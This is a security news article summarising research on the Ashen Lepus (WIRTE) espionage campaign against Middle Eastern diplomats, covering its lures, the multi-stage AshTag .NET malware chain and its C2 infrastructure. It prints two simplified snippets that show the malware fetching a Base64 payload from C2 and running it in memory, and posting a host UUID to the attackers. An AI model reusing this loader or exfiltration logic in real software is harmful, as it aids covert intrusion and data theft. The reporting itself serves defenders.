A Hamas-affiliated hacking group, identified as Ashen Lepus and also known as WIRTE, has been actively conducting a sophisticated espionage campaign targeting governmental and diplomatic entities across the Middle East. This operation utilizes highly realistic Arabic-language diplomatic lures, referencing regional politics and security discussions, to manipulate officials into opening malicious documents. The objective of this campaign is to illicitly obtain sensitive diplomatic information and establish persistent access to compromised systems.
The group’s tactics involve distributing seemingly innocuous PDF files that prompt victims to download RAR archives. These archives contain a fake document executable, a malicious loader, and a decoy PDF. Upon execution of the apparent document, a hidden malicious DLL is side-loaded, initiating the infection chain, while a harmless PDF is displayed to the user, aiming to reduce suspicion. This detailed analysis of the Ashen Lepus activity and their new AshTag malware was published by Palo Alto Networks security researchers.
Ashen Lepus Employs New AshTag Malware for Persistent Espionage
The Ashen Lepus threat actor has introduced a new malware suite named AshTag, specifically designed for stealthy intelligence gathering. This campaign has demonstrated continued operation even amidst recent regional conflicts and subsequent ceasefires, highlighting the group’s unwavering commitment to sustained intelligence collection rather than immediate disruption. The AshTag toolkit represents a significant evolution in the group’s capabilities, moving from previous methods to a more refined approach.
Palo Alto Networks researchers observed distinct changes in both the AshTag malware and its command-and-control (C2) infrastructure. The group is now obscuring its traffic by leveraging API-style subdomains of legitimate-looking websites, such as api.healthylifefeed[.]com and auth.onlinefieldtech[.]com. This contrasts with their previous practice of using dedicated attacker-owned domains. Additionally, payloads are executed directly in memory, minimizing forensic traces on disk and further enhancing stealth.
AshTag Infection Mechanism and Orchestrator Design
At the heart of the campaign is the AshTag malware itself, a modular .NET backdoor. It masquerades as a legitimate utility, VisualServer, but is engineered to facilitate file exfiltration, command execution, and the in-memory loading of additional tools. The infection chain is structured in multiple stages, commencing with an initial loader named AshenLoader, followed by a secondary stager called AshenStager, and culminating in an orchestration component, AshenOrchestrator, which manages all subsequent modules.
AshenLoader initiates communication with the C2 server, transmitting basic host information and retrieving AshenStager, which is cleverly hidden within HTML content via custom header tags. AshenStager then fetches another HTML page, from which it extracts a Base64-encoded payload concealed within article tags. This payload contains the crucial AshenOrchestrator component, which dictates the subsequent actions of the malware.
A simplified representation of this parsing logic demonstrates how the malware extracts and executes embedded data:
var html = GetHtml(c2Url);
var match = Regex.Match(html, “
“);
var b64 = match.Groups[“data”].Value;
var payload = Convert.FromBase64String(b64);
ExecuteInMemory(payload);
Upon receiving its configuration, AshenOrchestrator decodes a Base64-encoded JSON object containing critical parameters such as C2 domains, module URLs, encryption keys, and jitter values used to randomize beacon timing. It establishes an AES key derived from specific parameters, which is then used to decrypt an XOR key. This decrypted XOR key is subsequently employed to decode another embedded payload. This next payload is also a Base64-encoded JSON object detailing the module’s class name (e.g., SN for system fingerprinting or SCT for screen capture) and its loading method. This method can instruct the orchestrator to save a module to disk, execute it as a .NET assembly, upload additional content, or inject code into memory.
One recovered module, designated SN, is responsible for host profiling. It performs simple WMI queries to gather system information and transmits a unique victim ID back to the attackers. This systematic profiling enables Ashen Lepus to prioritize high-value diplomatic targets, refining their espionage efforts. A rudimentary illustration of this module’s function is as follows:
var id = GetWmi(“Win32_ComputerSystemProduct”, “UUID”);
PostToC2(“/api/v2/register”, id);
The intricate layering of loaders, HTML-embedded payloads, and modular .NET components underscores Ashen Lepus’s ongoing refinement of its tradecraft. The group maintains a simple yet flexible codebase, finely tuned for stealthy diplomatic espionage. The continued evolution of such threat actor tactics necessitates constant vigilance and adaptation from cybersecurity professionals to defend against persistent information-gathering operations.